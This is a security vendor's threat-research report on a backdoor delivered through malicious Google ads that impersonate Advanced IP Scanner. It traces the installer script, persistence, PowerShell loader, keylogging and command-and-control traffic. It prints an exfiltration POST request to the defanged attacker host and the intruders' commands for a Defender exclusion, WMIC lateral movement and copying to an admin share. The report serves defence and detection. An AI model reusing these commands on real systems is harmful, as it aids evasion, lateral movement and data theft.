eSentire is The Authority in Managed Detection and Response Services, protecting the critical data and applications of 2000+ organizations in 80+ countries from known and unknown cyber threats. Founded in 2001, the company’s mission is to hunt, investigate and stop cyber threats before they become business disrupting events.
We provide sophisticated cybersecurity solutions for Managed Security Service Providers (MSSPs), Managed Service Providers (MSPs), and Value-Added Resellers (VARs). Find out why you should partner with eSentire, the Authority in Managed Detection and Response, today.
Adversaries don’t work 9-5 and neither do we. At eSentire, our 24/7 SOCs are staffed with Elite Threat Hunters and Cyber Analysts who hunt, investigate, contain and respond to threats within minutes.
We have discovered some of the most dangerous threats and nation state attacks in our space – including the Kaseya MSP breach and the more_eggs malware.
Our Security Operations Centers are supported with Threat Intelligence, Tactical Threat Response and Advanced Threat Analytics driven by our Threat Response Unit – the TRU team.
In TRU Positives, eSentire’s Threat Response Unit (TRU) provides a summary of a recent threat investigation. We outline how we responded to the confirmed threat and what recommendations we have going forward.
Here’s the latest from our TRU Team…
Latest Update: January 12th, 2023 - The backdoor reported by @G60930953 is identified as ThunderShell, an open-source RAT available on GitHub. ConnectWise, naming it Parcel RAT, and Mandiant, calling it SMOKEDHAM, have also reported on this malware. Top of Form
What did we find?
In November 2023, eSentire’s Threat Response Unit (TRU) detected WorkersDevBackdoor malware impacting a customer in business services industry. This malware spreads through malicious online ads, tricking users into downloading it by mimicking legitimate software. Once installed, it secretly collects sensitive information and provides backdoor access to the infected system. The full infection chain with the suspicious PowerShell command is shown in Figure 1.
Figure 1: infection chain
The initial infection vector was a drive-by download via a Google Search advertisement. The service can be used to distribute malware to targets within an ideal group, such as network administrators without knowledge of their email address (something that would be required for malware delivered via email). Compounding this problem is the inherent trust that the platform is filtering malicious content, and email-oriented security awareness programs.
In this case, the user had searched for the Advanced IP Scanner application and downloaded the malicious installer from an imposter website at advanced-ip-scanners[.]net. The malicious installer was created using NSIS (Nullsoft Scriptable Install System), an open-source system used to create Windows installers. Upon unpacking the installer, we see the ZIP archive named WindowsDev.7z.
Figure 2: The contents of Advanced IP Installer
NSIS-generated installers come with NSIS.ini script that automates the installation process. We can view the INI file with 7z but the latest versions of 7z cannot see the INI file, we will use the older version instead (7z 9.38).
The [NSIS].ini script performs the actions listed in Figure 3.
The script checks for the presence of Cert.txt in the installation directory, if the file is not present, it jumps to label_54.
The script reads a value CurrentMajorVersionNumber from the Windows registry into the variable $R1 (checks for the major OS version of the host).
It then reads another registry value at HKLM\system\CurrentControlSet\Services\TcpIp\Parameters\Domain into the variable $R2 (check if the host is domain-joined).
Next, it compares the registry values stored in $R1 and $R2 to an empty string. If either value is empty, the script jumps to the label label_54, which stops further commands from processing.
If $R1 and $R2 is not 0, then the script extracts the malicious files from WindowsDev.7z with the password “Yh23wE34Wegi7eye56ib6aih6Mn8u8bai4eizna” and copies them into C:\ProgramData\Microsoft\LogConverter folder.
The script creates the persistence via Registry Run Keys with the value “PressAnyKey” to run the shortcut file at C:\ProgramData\Microsoft\LogConverter\Microsoft.NodejsTools.PressAnyKey.lnk.
The shortcut files execute Microsoft.NodejsTools.PressAnyKey.exe, which is used as a LOLBAS
to execute the batch file NodejsToolsVsix.bat (Figure 4). We could also see some interesting metadata left by the malware developer (Figure 5).
Figure 3: Contents of NSIS.ini scriptFigure 4: Arguments for the shortcut fileFigure 5: Metadata left by the malware developer
The batch file NodejsToolsVsix.bat contains the code to set the PowerShell Path. It sets a variable LinkRunPS to the default PowerShell path. This is used to ensure the script uses the correct version of PowerShell. The IF statement checks the system architecture and adjusts the PowerShell path if the system is 64-bit. Then it executes the batch script via InvokeScript (Figure 6).
Figure 6: Execution of the PowerShell script via batch file
Let’s briefly look at the PowerShell script. The command “$UMGHyr0wTZa2 = convertto-securestring -String $k2FJj7u5G1vW -Key ($5ob67dVlTngs)” is creating a secure string using the convertto-securestring
cmdlet. It decrypts the data (2) under $k2FJj7u5G1vW with the key (1) under $5ob67dVlTngs variable. The last line (3) calls a static method HMEqRPzgHocKlu on a class RZjKVf.ovbEFleTI, which is defined in the injected code. The method takes three parameters, including a URL and two other strings (Figure 7).
Figure 7: PowerShell script (CG6oDkyFHl3R.t)
The encrypted data is the .NET payload that gets loaded in memory upon the execution of the PowerShell script.
In Figure 8 we see the function responsible for creating a seed for the random number generator. The seed is a bitwise XOR of the current process's ID and the number of seconds since January 1, 1970 (Unix epoch time). This approach makes the random seed more unique and less predictable. The conditional statement “if (fzBoRxFO == 0) { fzBoRxFO = random.Next(1, 16)” determines the length of the generated string.
If the fzBoRxFO parameter is 0, the length is set to a random value between 1 and 15. The “for” loop iterates 15 times, each time appending a randomly selected character from the text string to a StringBuilder object. The generated string is then used as a part of the URL path to send POST requests of the victim’s data to C2. The function is also used to generate a unique ID for the infected machine to communicate with C2.
Figure 8: String generator
You can see the example of randomly generated strings in traffic capture in Figure 9.
Figure 9: Traffic capture
The function in Figure 10 creates as formatted string consisting of the string “register”, unique ID created. The method ZyKZ() is creating a string that combines the computer name, user domain, and username into a single string and appending it to the formatted string to send out to the C2 upon initial infection (registering the infected host).
Figure 10: Function responsible for formatting the string to register the infected device
The formatted string is then encrypted with RC4 with the hardcoded key in the PowerShell script, gets base64-encoded, and is sent out to C2 in the following JSON format:
The script sleeps for 1000 milliseconds and awaits the response/further commands from C2. The commands from C2 are also RC4-encrypted with the same key and base64-encoded. The first automated command from C2 is “whoami”.
Further on, the script sleeps for the amount of time assigned in the PowerShell script (in our case it’s 75000 milliseconds) each time after it receives the response from the C2. After approximately 6-10 minutes after the malicious payload execution have observed the threat actors running the following commands on the infected host:
<ul><li>net user</li><li>nslookup -type=srv_ldap._tcp.<redacted></redacted></li><li>systeminfo</li><li>whoami</li><li>"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\</li><li>"C:\Windows\System32\Wbem\WMIC.exe" /node:<redacted> process call create "cmd.exe /c c:\programdata\Microsoft\LogConverter\Microsoft.NodejsTools.PressAnyKey.lnk" (the threat actor attempted to move laterally to another host via WMIC)</redacted></li><li>"C:\Windows\system32\xcopy.exe" c:\programdata\microsoft\LogConverter \\<redacted>\C$\programdata\Microsoft\LogConverter /E /H /Y (the threat actor attempted to copy the malicious file to another host)</redacted></li></ul>
We have named the .NET backdoor “WorkDevBackdoor”. The backdoor also has keylogger functionality and retrieves the title of the currently active window (Figure 11). The captured input is then base64-encoded and appended with the GUID parameter of the infected host along with the string “userinput”.
Figure 11: Keylogger functionality
Here is the example of the POST request sent to C2:
POST hxxps://cdn-us-tech.wtf-system-4758995.workers[.]dev/MsB0h/ HTTP/1.1
User-Agent: Microsoft Windows NT 10.0.16299.0
Content-Type: application/json
Host: cdn-us-tech.wtf-system-4758995.workers[.]dev
Content-Length: 131
Expect: 100-continue
Connection: Keep-Alive
{"UUID":<REDACTED>,"ID":"sMsB0hNEMIglZ8J8","Data":<base64-encoded string”>}
We did some research and found a similar chain of infection described by @0xBurgers (Figure 12).
Figure 12: Twitter post of the similar threat by @0xBurgers
You can access the Yara rules for WorkDevBackdoor here.
What did we do?
Our machine-learning powered PowerShell classifier, BlueSteel, detected the execution of the suspicious PowerShell command.
Our team of 24/7 SOC Cyber Analysts isolated the affected host, contained the threat and notified the customer of suspicious activities.
What can you learn from this TRU positive?
The drive-by download initiated via Google Ads highlights the growing trend of attackers leveraging reputable platforms to spread malware. This method is particularly effective due to the inherent trust users place in these platforms.
The infection process involving a malicious installer created with NSIS and the elaborate setup of the PowerShell script demonstrates the attackers' sophistication. It underscores the need for vigilance even when downloading software from seemingly reliable sources.
The infection script's ability to check for specific system characteristics (like OS version and domain-joined status) before executing indicates a possible targeted approach. The use of Registry Run Keys for persistence reveals a focus on maintaining long-term access to infected systems.
The employment of PowerShell scripts and .NET payloads for in-memory execution highlights the trend of using native tools and languages for stealth and evasion, known as "Living off the Land" (LOLBin) tactics.
WorkDevBackdoor's ability to log keystrokes and retrieve active window titles, along with the encoded transmission of this data, points to its capabilities for data exfiltration and sensitive data theft.
The observed use of commands for lateral movement and the execution of additional tools (like WMIC.exe and xcopy.exe) indicate the attacker's intent to expand their foothold and control over the network.
Recommendations from our Threat Response Unit (TRU):
Protecting against malware requires a multi-layered defense approach to defend endpoints from malware and detect or block unauthorized login activity against applications and remote access services. Therefore, we recommend:
The eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your organization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7 Security Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and works as an extension of your security team to continuously improve our Managed Detection and Response service. By providing complete visibility across your attack surface and performing global threat sweeps and proactive hypothesis-driven threat hunts augmented by original threat research, we are laser-focused on defending your organization against known and unknown threats.
Cookies allow us to deliver the best possible experience for you on our website - by continuing to use our website or by closing this box, you are consenting to our use of cookies. Visit our Privacy Policy to learn more.
